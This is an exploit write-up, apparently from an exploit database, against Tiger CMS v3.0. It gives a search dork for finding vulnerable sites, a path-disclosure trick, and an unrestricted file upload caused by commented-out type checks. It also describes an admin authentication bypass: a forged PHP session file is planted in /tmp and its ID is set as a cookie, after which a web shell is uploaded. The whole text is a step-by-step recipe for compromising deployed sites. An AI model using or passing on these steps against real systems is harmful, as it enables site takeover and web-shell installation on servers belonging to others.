Tiger CMS 3.0 Administrative Bypass

`==========================================  
TIGER CMS <= v3.0 Bypass admin / get shell  
==========================================  
  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 0  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1  
  
#[+] Discovered By : Inj3ct0r  
#[+] Site : Inj3ct0r.com  
#[+] support e-mail : submit[at]inj3ct0r.com  
  
  
Product : TIGER CMS  
Vesrion : v3.0  
Site : http://tigercms.com/  
Dork:"Powered by TIGER CMS v3.0"  
  
  
Path Disclosure  
  
Sample : http://bobruisk.name/admin/engine/modules/uploads/  
  
Usage:  
  
  
http://site.com/path/admin/engine/modules/[module_name]  
  
Standard modules, which are suitable for this purpose:  
  
uploads  
content  
links  
metatags  
news  
pass  
templates  
  
Filling an arbitrary file  
Unclear why, but the fault of all - 2 default lines.  
  
PHP code:  
  
$type = strtolower(substr($filename, 1 + strrpos($filename, ".")));   
//$types_ok = array("jpg", "bmp", "gif", "png");   
//if(!in_array($type, $types_ok)) $Validate->Locate("javascript:window.close();", 0, 1, "Íåâåðíûé ôîðìàò ôàéëà.");   
  
$new_name = 'tiger-'.time().'.'.$type;   
$a = copy($file, "../uploads/".$new_name);   
$path_all = getenv("SERVER_NAME");   
  
Example:  
  
http://site.com/path/admin/?task=uploads&sub_task=add  
  
  
Bypass authentication to the admin.  
  
Need:  
  
Shell on the neighboring site  
Access to write to the / tmp  
  
Vulnerable code:  
  
admin/login/login2.php  
  
PHP code:  
  
$_SESSION['user_id_admin'] = $id_admin;   
$Admins->SuccessAuth($login);   
  
  
For a successful login, we will need to login admin. Venture to suggest that it is "admin"  
  
Represents sesiyu:  
  
Name: sess_0526152ea0fed5dbbfca86639e0f6fa7  
  
Contents:  
  
user_id_admin | s: 1: "1";  
  
Keeping in / tmp  
Do not forget to right 777!  
Next forges cookies in your browser:  
  
PHPSESSID=0526152ea0fed5dbbfca86639e0f6fa7  
  
  
Go:  
  
http://site.com/path/admin/, successfully passed authentication pour shell as described above.  
  
  
ThE End =] Visit my proj3ct :  
  
http://inj3ct0r.com  
http://inj3ct0r.org  
http://inj3ct0r.net  
  
# ~ - [ [ : Inj3ct0r : ] ]`